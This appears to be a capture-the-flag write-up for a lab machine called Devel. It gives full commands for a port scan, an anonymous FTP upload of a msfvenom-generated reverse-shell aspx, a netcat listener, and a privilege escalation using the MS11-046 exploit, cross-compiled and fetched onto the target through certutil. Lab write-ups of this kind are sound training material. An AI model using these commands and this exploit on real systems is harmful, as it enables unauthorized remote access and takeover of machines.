nmap -A -p- -T4 -vvv -oN devel 10.10.10.5
FTP upload test
From nmap result it says ftp allows anonymous login. Now I test whether I can upload files.
I can also do directory and file listing.
Test if the files in FTP reflects the page in the web.
The iistart.htm is also available.
Test if the file I upload can be displayed in the web.
Generate a reverse shell aspx
msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.20 lport=4444 -f aspx -o devel.aspx
This file will then be uploaded to the ftp.
Get the windows shell
nc -lvnp 4444
With the browser go to http://10.10.10.5/devel.aspx to initiate the reverse connection.
Understand the system and get the exploit
6.1.7600 N/A Build 7600 is the version after searching and testing a few exploits, this one works the best – https://github.com/abatchy17/WindowsExploits/blob/master/MS11-046/40564.c the condition to use this exploit is first get a valid logon which I have already done and be able to execute the exploit locally.
Also although the virtual machine is 64-bit the Windows 7 is a 32-bit version.
Compile the source code
I will be compiling the source code in linux locally then I will set up a http server with python, and I use certutil in Devel to download the compiled binary.
Cross compiler is required to compile the windows binary within linux environment.
apt install mingw-w64
I would need to compile the exploit in 32-bit binary in order to run in Devel.
i686-w64-mingw32-gcc 40564.c -o devel.exe -lws2_32
Setup a http server in my kali machine
python3 -m http.server 80
Then on Devel use
certutil -urlcache -f http://10.10.14.20/devel.exe C:\Users\Public\Downloads\devel.exe
From now I can get both the babis user and Administrator’s flag.
After I have got the flags, I exit from the escalated environment to revert backt to the original user, then delete the devel.exe which I downloaded.
Although this is an easy machine it provides good practice to try to do the hack manually, there are other solutions which use metasploit’s exploits to do the hack but I want to try to see if a manual way is possible, I also wanted to cross compile another cpp file to test if the exploit works on Devel, until next time.